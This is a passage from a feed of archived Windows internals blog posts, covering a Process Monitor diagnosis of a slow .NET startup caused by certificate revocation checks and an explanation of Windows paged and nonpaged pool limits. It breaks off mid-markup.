stack sizes and processes specify their minimum working sets, the two major factors that determine the answer on any particular system include the amount of physical memory and the system commit limit. In any case, applications that create enough threads or processes to get anywhere near these limits should rethink their design, as there are almost always alternate ways to accomplish the same goals with a reasonable number. For instance, the general goal for a scalable application is to keep the number of threads running equal to the number of CPUs (with NUMA changing this to consider CPUs per node) and one way to achieve that is to switch from using synchronous I/O to using asynchronous I/O and rely on I/O completion ports to help match the number of running threads to the number of CPUs. </P> </BODY></HTML> Thu, 27 Jun 2019 06:54:50 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824 MarkRussinovich 2019-06-27T06:54:50Z The Case of the Slow Keynote Demo https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-keynote-demo/ba-p/723801 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on May 23, 2009 </STRONG> <BR /> <P> A couple of weeks ago I participated for the first time in the <A href="#" mce_href="#" target="_blank"> keynote at Microsoft’s Teched US conference </A> to a room of over 5,000 attendees. Bill Veghte, the Senior Vice President of Windows marketing, led the keynote and gave a tour of the user-focused features of Windows 7, Iain McDonald, General Manager for Windows Server, demonstrated new functionality in Hyper-V and Windows Server 2008 R2, and I demonstrated IT Pro-oriented enhancements in Windows 7 and Microsoft Desktop Optimization Pack (MDOP). </P> <BR /> <P> I showed features like <A href="#" mce_href="#" target="_blank"> BitLocker To Go </A> group policy settings, PowerShell v2’s remoting capabilities, PowerShell’s ability to script group policy objects, Microsoft Enterprise Desktop Virtualization (MEDV) and how the combination of App-V, roaming user profiles and folder redirection enable a replaceable PC scenario with minimal downtime. One point I reinforced was the fact that we made every effort to ensure that application-compatibility fixes (called shims) that IT Pros have developed for Vista applications work on Windows 7. I also demonstrated Windows 7’s new <A href="#" mce_href="#" target="_blank"> AppLocker </A> feature, which allows IT Pros to restrict the software that users can run on enterprise desktops with flexible rules for identifying software. </P> <BR /> <P> In the weeks leading up to the keynote I worked with Jason Leznek, the owner of the IT Pro portion of the keynote, to identify the features I’d showcase and to design the demos. We used dry runs to walk through the script, tweaking the demos and creating transitions, trimming content to fit the time allotted to my segment, and tightening my narration to focus on the benefits of the new technologies. For the application-compatibility demo, we decided to use a sample program used internally at Microsoft, called Stock Viewer, that’s intentionality incompatible with Vista and Windows 7 in ways representative of actual line-of-business software that doesn’t run without assistance on these newer operating systems. In my demo, I would launch Stock Viewer on Windows 7 and show how its trends report function fails with an obscure error message caused by incompatibility: </P> <BR /> <P> <IMG alt="image" border="0" height="320" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_13.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121125i8C898BE98F356B6E" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="553" /> </P> <BR /> <P> Then I’d show how I could deploy an application compatibility shim that enables the application to work correctly on Vista and then rerun the application successfully. </P> <BR /> <P> We also wanted to show how AppLocker’s rule creation wizard makes it easy to allow software to run based on the publisher or version if the software is digitally signed. Originally, we planned on showing AppLocker after the application compatibility demo and enabling Adobe Acrobat Reader, an application commonly used in enterprises. We rehearsed this flow a couple of times, but found the transitions a little awkward, so I suggested that we sign the Stock Viewer executable and move the AppLocker demo before the shim demo. I’d be able to enable Stock Viewer to run with an AppLocker rule and then show how the shim helps it run correctly, using it for both demos. </P> <BR /> <P> I went back to my office, signed Stock Viewer with the <A href="#" mce_href="#" target="_blank"> Sysinternals </A> signing certificate and sent it to Jason. A few hours later he emailed me saying that something was wrong with the demo system because Stock Viewer, which had previously launched instantly, now took over a minute to start. We were counting down to TechEd and he was panicked because we needed to nail down the demos. I had heard at some point in the past that .NET does authenticode signature checks when it loads digitally signed assemblies, so my first suspicion was that it was related to that. I asked Jason to capture a <A href="#" mce_href="#" target="_blank"> Process Monitor </A> trace and he emailed it back a few minutes later. </P> <BR /> <P> After opening the log, the first thing I did was filter events for StockViewer.exe by finding its first operation and right-clicking to set a quick filter: </P> <BR /> <P> <IMG alt="image" border="0" height="226" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121126iFB6EC9D5229FA404" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="358" /> </P> <BR /> <P> Then I looked at the timestamps on the first item, 2:27:20, and the last item, 2:28:32, which correlated with the minute delay Jason had observed. As I scrolled through the trace I saw many references to cryptography (crypto) Registry keys and file system directories, as well as references to TCP/IP settings, but I knew that there had to be at least one major gap in the timestamps to account for the long delay. I scanned the log from the beginning and found a gap of roughly 10 seconds at 2:27:22: </P> <BR /> <P> <IMG alt="image" border="0" height="162" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_1.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121127iCEB0954B54CBF6BE" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The operations immediately before were references to the Rasadhlp.dll, a networking-related DLL, and a little earlier there were lots of references to Winsock registry keys, with accesses to crypto Registry keys immediately after the 10 second delay. It appeared that the system was not connected to the Internet and that the application was held up by some networking timeout of roughly 10 seconds. I looked forward in order to find the next gap and came across a 12-second interval: </P> <BR /> <P> <IMG alt="image" border="0" height="109" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_3.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121128iEA30324415C91BC3" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> Again, networking-related activity before, and crypto related activity after. The subsequent gap, also of 12-seconds, was identical: </P> <BR /> <P> <IMG alt="image" border="0" height="125" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_4.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121129i5CED0AADB277583C" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> In fact, the next few gaps looked virtually identical. In each case there was a reference to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections immediately before the pause, so I set a filter for that path and RegOpenKey and sure enough, could easily see six gaps of exactly 12-seconds each: </P> <BR /> <P> <IMG alt="image" border="0" height="135" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121130i7DD34D6D0F2795B2" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The sum of the gaps – 12 times 6 – equaled the delay Jason was seeing. Next, I wanted to verify that the repeated attempts to access the network were caused by signing verification so I started looking at the stacks of various events by selecting them and typing Ctrl+K to open the stack properties dialog. The stack for events related to the Internet connection settings revealed that crypto was the reason: </P> <BR /> <P> <IMG alt="image" border="0" height="230" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_8.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121132i6C7456FF92744C28" style="BORDER-BOTTOM: 0px; BORDER-LEFT: 0px; DISPLAY: inline; BORDER-TOP: 0px; BORDER-RIGHT: 0px" title="image" width="411" /> </P> <BR /> <P> One final piece of evidence I wanted to check for was that .NET was ultimately responsible for these checks. I rescanned the log and I saw events in the trace that confirmed that Stock Viewer is a .NET application: </P> <BR /> <P> <IMG alt="image" border="0" height="103" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_7.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121133i1E86873E9EC4CB2F" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> I also looked at the stacks of some of the early events referencing crypto Registry keys and saw that it was the .NET runtime performing the call to <A href="#" mce_href="#" target="_blank"> WinVerifyTrust </A> , the Windows function for checking the digital signature on a file, that started the cascade of attempted Internet accesses: </P> <BR /> <P> <IMG alt="image" border="0" height="299" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_11.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121134i27141126855D8BF3" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="476" /> </P> <BR /> <P> Confident now that the cause of the startup delay was due to .NET seeing that Stockviewer.exe was signed and then checking to see if the signing certificate had been revoked, I entered Web searches looking for a way to make .NET to skip the check, since I knew that the keynote machines probably wouldn’t be connected to the Internet during the actual keynote. After a couple of minutes of reading through articles by others with similar experiences, I found this <A href="#" mce_href="#" target="_blank"> KB article </A> : </P> <BR /> <P> <IMG alt="image" border="0" height="206" mce_src="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_9.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowKeynoteDemo_7894/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121135i006FA8D28B864210" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="554" /> </P> <BR /> <P> The article describes exactly the symptoms we were seeing and notes that .NET 2.0, which is the version of .NET I could see Stock Viewer was using based on the paths of the .NET DLLs it accessed during the trace, supports a way to turn off its obligatory checking of assembly digital signatures: create a configuration file in the executable’s directory with the same name as the executable except with “.config” appended (e.g. StockViewer.exe.config) containing the following XML: </P> <BR /> <P> <FONT face="Courier New" size="2"> </FONT> </P> <BR /> <P> <FONT face="Courier New" size="2"> &lt;?xml version="1.0" encoding="utf-8"?&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;configuration&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;runtime&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;generatePublisherEvidence enabled="false"/&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;/runtime&gt; <BR /> </FONT> <FONT face="Courier New" size="2"> &lt;/configuration&gt; </FONT> </P> <BR /> <P> A total of about 15 minutes since I had received Jason’s email, I sent him a reply explaining my conclusion with the configuration file attached. Shortly after, he wrote back confirming the delays were gone and expressing amazement that I had figured out the problem and solution so quickly. It might have seemed like magic to him, but I had simply used basic Process Monitor troubleshooting techniques and the Web to solve the case. Needless to say, the revised demo flow and transition between AppLocker and application compatibility came off great. </P> </BODY></HTML> Thu, 27 Jun 2019 06:52:21 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-keynote-demo/ba-p/723801 MarkRussinovich 2019-06-27T06:52:21Z Pushing the Limits of Windows: Paged and Nonpaged Pool https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-paged-and-nonpaged-pool/ba-p/723789 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 10, 2009 </STRONG> <BR /> <P> In previous Pushing the Limits posts, I described the two most basic system resources, <A href="#" target="_blank"> physical memory </A> and <A href="#" target="_blank"> virtual memory </A> . This time I’m going to describe two fundamental kernel resources, paged pool and nonpaged pool, that are based on those, and that are directly responsible for many other system resource limits including the maximum number of processes, synchronization objects, and handles. </P> <P> Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. </P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <BLOCKQUOTE> </BLOCKQUOTE> <P> Paged and nonpaged pools serve as the memory resources that the operating system and device drivers use to store their data structures. The pool manager operates in kernel mode, using regions of the system’s virtual address space (described in the Pushing the Limits post on virtual memory) for the memory it sub-allocates. The kernel’s pool manager operates similarly to the C-runtime and Windows heap managers that execute within user-mode processes.&nbsp; Because the minimum virtual memory allocation size is a multiple of the system page size (4KB on x86 and x64), these subsidiary memory managers carve up larger allocations into smaller ones so that memory isn’t wasted. </P> <P> For example, if an application wants a 512-byte buffer to store some data, a heap manager takes one of the regions it has allocated and notes that the first 512-bytes are in use, returning a pointer to that memory and putting the remaining memory on a list it uses to track free heap regions. The heap manager satisfies subsequent allocations using memory from the free region, which begins just past the 512-byte region that is allocated. </P> <H3> Nonpaged Pool </H3> <P> The kernel and device drivers use nonpaged pool to store data that might be accessed when the system can’t handle page faults. The kernel enters such a state when it executes interrupt service routines (ISRs) and deferred procedure calls (DPCs), which are functions related to hardware interrupts. Page faults are also illegal when the kernel or a device driver acquires a spin lock, which, because they are the only type of lock that can be used within ISRs and DPCs, must be used to protect data structures that are accessed from within ISRs or DPCs and either other ISRs or DPCs or code executing on kernel threads. Failure by a driver to honor these rules results in the most common crash code, <A href="#" target="_blank"> IRQL_NOT_LESS_OR_EQUAL </A> . </P> <P> Nonpaged pool is therefore always kept present in physical memory and nonpaged pool virtual memory is assigned physical memory. Common system data structures stored in nonpaged pool include the kernel and objects that represent processes and threads, synchronization objects like mutexes, semaphores and events, references to files, which are represented as file objects, and I/O request packets (IRPs), which represent I/O operations. </P> <H3> Paged Pool </H3> <P> Paged pool, on the other hand, gets its name from the fact that Windows can write the data it stores to the paging file, allowing the physical memory it occupies to be repurposed. Just as for user-mode virtual memory, when a driver or the system references paged pool memory that’s in the paging file, an operation called a page fault occurs, and the memory manager reads the data back into physical memory. The largest consumer of paged pool, at least on Windows Vista and later, is typically the Registry, since references to registry keys and other registry data structures are stored in paged pool. The data structures that represent memory mapped files, called <EM> sections </EM> internally, are also stored in paged pool. </P> <P> Device drivers use the <A href="#" target="_blank"> ExAllocatePoolWithTag </A> API to allocate nonpaged and paged pool, specifying the type of pool desired as one of the parameters. Another parameter is a 4-byte <EM> Tag </EM> , which drivers are supposed to use to uniquely identify the memory they allocate, and that can be a useful key for tracking down drivers that leak pool, as I’ll show later. </P> <H3> Viewing Paged and Nonpaged Pool Usage </H3> <P> There are three performance counters that indicate pool usage: </P> <UL> <LI> Pool nonpaged bytes </LI> <LI> Pool paged bytes (virtual size of paged pool – some may be paged out) </LI> <LI> Pool paged resident bytes (physical size of paged pool) </LI> </UL> <P> However, there are no performance counters for the maximum size of these pools. They can be viewed with the kernel debugger !vm command, but with Windows Vista and later to use the kernel debugger in local kernel debugging mode you must boot the system in debugging mode, which disables MPEG2 playback. </P> <P> So instead, use Process Explorer to view both the currently allocated pool sizes, as well as the maximum. To see the maximum, you’ll need to configure Process Explorer to use symbol files for the operating system. First, install the latest <A href="#" target="_blank"> Debugging Tools for Windows </A> package. Then run Process Explorer and open the Symbol Configuration dialog in the Options menu and point it at the dbghelp.dll in the Debugging Tools for Windows installation directory and set the symbol path to point at Microsoft’s symbol server: </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121105iFFED344EAE4F135E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> After you’ve configured symbols, open the System Information dialog (click System Information in the View menu or press Ctrl+I) to see the pool information in the Kernel Memory section. Here’s what that looks like on a 2GB Windows XP system: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121106i985B891A378EB826" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> <EM> 2GB 32-bit Windows XP </EM> </P> <H3> Nonpaged Pool Limits </H3> <P> As I mentioned in a previous post, on 32-bit Windows, the system address space is 2GB by default. That inherently caps the upper bound for nonpaged pool (or any type of system virtual memory) at 2GB, but it has to share that space with other types of resources such as the kernel itself, device drivers, system Page Table Entries (PTEs), and cached file views. </P> <P> Prior to Vista, the memory manager on 32-bit Windows calculates how much address space to assign each type at boot time. Its formulas takes into account various factors, the main one being the amount of physical memory on the system.&nbsp; The amount it assigns to nonpaged pool starts at 128MB on a system with 512MB and goes up to 256MB for a system with a little over 1GB or more. On a system booted with the /3GB option, which expands the user-mode address space to 3GB at the expense of the kernel address space, the maximum nonpaged pool is 128MB. The Process Explorer screenshot shown earlier reports the 256MB maximum on a 2GB Windows XP system booted without the /3GB switch. </P> <P> The memory manager in 32-bit Windows Vista and later, including Server 2008 and Windows 7 (there is no 32-bit version of Windows Server 2008 R2) doesn’t carve up the system address statically; instead, it dynamically assigns ranges to different types of memory according to changing demands. However, it still sets a maximum for nonpaged pool that’s based on the amount of physical memory, either slightly more than 75% of physical memory or 2GB, whichever is smaller. Here’s the maximum on a 2GB Windows Server 2008 system: </P> <P> <IMG alt="image" border="0" height="119" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121107i788273D1AF235A65" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 32-bit Windows Server 2008 </EM> </P> <P> 64-bit Windows systems have a much larger address space, so the memory manager can carve it up statically without worrying that different types might not have enough space. 64-bit Windows XP and Windows Server 2003 set the maximum nonpaged pool to a little over 400K per MB of RAM or 128GB, whichever is smaller. Here’s a screenshot from a 2GB 64-bit Windows XP system: </P> <P> <IMG alt="image" border="0" height="117" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121108i7D08DFEDD39E8D0F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 64-bit Windows XP </EM> </P> <P> 64-bit Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 memory managers match their 32-bit counterparts (where applicable – as mentioned earlier, there is no 32-bit version of Windows Server 2008 R2) by setting the maximum to approximately 75% of RAM, but they cap the maximum at 128GB instead of 2GB. Here’s the screenshot from a 2GB 64-bit Windows Vista system, which has a nonpaged pool limit similar to that of the 32-bit Windows Server 2008 system shown earlier. </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121109i8AE23A5E6003185E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 2GB 32-bit Windows Server 2008 </EM> </P> <P> Finally, here’s the limit on an 8GB 64-bit Windows 7 system: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121110i5A4C2D3A70CB5789" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 8GB 64-bit Windows 7 </EM> </P> <P> Here’s a table summarizing the nonpaged pool limits across different version of Windows: </P> <TABLE border="1" cellpadding="2" cellspacing="0" width="560"> <TBODY> <TR> <TD valign="top" width="179"> </TD> <TD align="center" valign="top" width="183"> <STRONG> 32-bit </STRONG> </TD> <TD align="center" valign="top" width="195"> <STRONG> 64-bit </STRONG> </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> XP, Server 2003 </STRONG> </TD> <TD align="center" valign="top" width="183"> up to 1.2GB RAM: 32-256 MB <BR /> &gt; 1.2GB RAM: 256MB </TD> <TD align="center" valign="top" width="195"> min( ~400K/MB of RAM, 128GB) </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> Vista, Server 2008, <BR /> Windows 7, Server 2008 R2 </STRONG> </TD> <TD align="center" valign="top" width="183"> min( ~75% of RAM, 2GB) </TD> <TD align="center" valign="top" width="195"> min(~75% of RAM, 128GB) </TD> </TR> <TR> <TD valign="top" width="179"> <STRONG> Windows 8, Server 2012 </STRONG> </TD> <TD align="center" valign="top" width="183"> min( ~75% of RAM, 2GB) </TD> <TD align="center" valign="top" width="195"> min( 2x RAM, 128GB) </TD> </TR> </TBODY> </TABLE> <H3> Paged Pool Limits </H3> <P> The kernel and device drivers use paged pool to store any data structures that won’t ever be accessed from inside a DPC or ISR or when a spinlock is held. That’s because the contents of paged pool can either be present in physical memory or, if the memory manager’s working set algorithms decide to repurpose the physical memory, be sent to the paging file and demand-faulted back into physical memory when referenced again. Paged pool limits are therefore primarily dictated by the amount of system address space the memory manager assigns to paged pool, as well as the system commit limit. </P> <P> On 32-bit Windows XP, the limit is calculated based on how much address space is assigned other resources, most notably system PTEs, with an upper limit of 491MB. The 2GB Windows XP System shown earlier has a limit of 360MB, for example: </P> <P> <IMG alt="image" border="0" height="123" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121111i30D28324087A573C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="184" /> </P> <P> <EM> 2GB 32-bit Windows XP </EM> </P> <P> 32-bit Windows Server 2003 reserves more space for paged pool, so its upper limit is 650MB. </P> <P> Since 32-bit Windows Vista and later have dynamic kernel address space, they simply set the limit to 2GB. Paged pool will therefore run out either when the system address space is full or the system commit limit is reached. </P> <P> 64-bit Windows XP and Windows Server 2003 set their maximums to four times the nonpaged pool limit or 128GB, whichever is smaller. Here again is the screenshot from the 64-bit Windows XP system, which shows that the paged pool limit is exactly four times that of nonpaged pool: </P> <P> <IMG alt="image" border="0" height="117" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121112iAC3EC3D0B967229B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="179" /> </P> <P> <EM> 2GB 64-bit Windows XP </EM> </P> <P> Finally, 64-bit versions of Windows Vista, Windows Server 2008, Windows 7 and Windows Server 2008 R2 simply set the maximum to 128GB, allowing paged pool’s limit to track the system commit limit. Here’s the screenshot of the 64-bit Windows 7 system again: </P> <P> <IMG alt="image" border="0" height="118" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121113i9D4F7C7F0310A257" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="176" /> </P> <P> <EM> 8GB 64-bit Windows 7 </EM> </P> <P> Here’s a summary of paged pool limits across operating systems: </P> <TABLE border="1" cellpadding="2" cellspacing="0" width="581"> <TBODY> <TR> <TD valign="top" width="171"> </TD> <TD align="center" valign="top" width="174"> <STRONG> 32-bit </STRONG> </TD> <TD align="center" valign="top" width="234"> <STRONG> 64-bit </STRONG> </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> XP, Server 2003 </STRONG> </TD> <TD align="center" valign="top" width="174"> XP: up to 491MB <BR /> Server 2003: up to 650MB </TD> <TD align="center" valign="top" width="234"> min( 4 * nonpaged pool limit, 128GB) </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> Vista, Server 2008, <BR /> Windows 7, Server 2008 R2 </STRONG> </TD> <TD align="center" valign="top" width="174"> min( system commit limit, 2GB) </TD> <TD align="center" valign="top" width="234"> min( system commit limit, 128GB) </TD> </TR> <TR> <TD valign="top" width="171"> <STRONG> Windows 8, Server 2012 </STRONG> </TD> <TD align="center" valign="top" width="174"> min( system commit limit, 2GB) </TD> <TD align="center" valign="top" width="234"> min( system commit limit, 384GB) </TD> </TR> </TBODY> </TABLE> <H3> Testing Pool Limits </H3> <P> Because the kernel pools are used by almost every kernel operation, exhausting them can lead to unpredictable results. If you want to witness first hand how a system behaves when pool runs low, use the <A href="#" target="_blank"> Notmyfault </A> tool. It has options that cause it to leak either nonpaged or paged pool in the increment that you specify. You can change the leak size while it’s leaking if you want to change the rate of the leak and Notmyfault frees all the leaked memory when you exit it: </P> <P> <IMG alt="image" border="0" height="450" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121114iAF713F59D631A4BB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="251" /> </P> <P> Don’t run this on a system unless you’re prepared for possible data loss, as applications and I/O operations will start failing when pool runs out. You might even get a blue screen if the driver doesn’t handle the out-of-memory condition correctly (which is considered a bug in the driver). The Windows Hardware Quality Laboratory (WHQL) stresses drivers using the Driver Verifier, a tool built into Windows, to make sure that they can tolerate out-of-pool conditions without crashing, but you might have third-party drivers that haven’t gone through such testing or that have bugs that weren’t caught during WHQL testing. </P> <P> I ran Notmyfault on a variety of test systems in virtual machines to see how they behaved and didn’t encounter any system crashes, but did see erratic behavior. After nonpaged pool ran out on a 64-bit Windows XP system, for example, trying to launch a command prompt resulted in this dialog: </P> <P> <IMG alt="image" border="0" height="137" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121115i2174BF72BC57FDEE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="420" /> </P> <P> On a 32-bit Windows Server 2008 system where I already had a command prompt running, even simple operations like changing the current directory and directory listings started to fail after nonpaged pool was exhausted: </P> <P> <IMG alt="image" border="0" height="102" 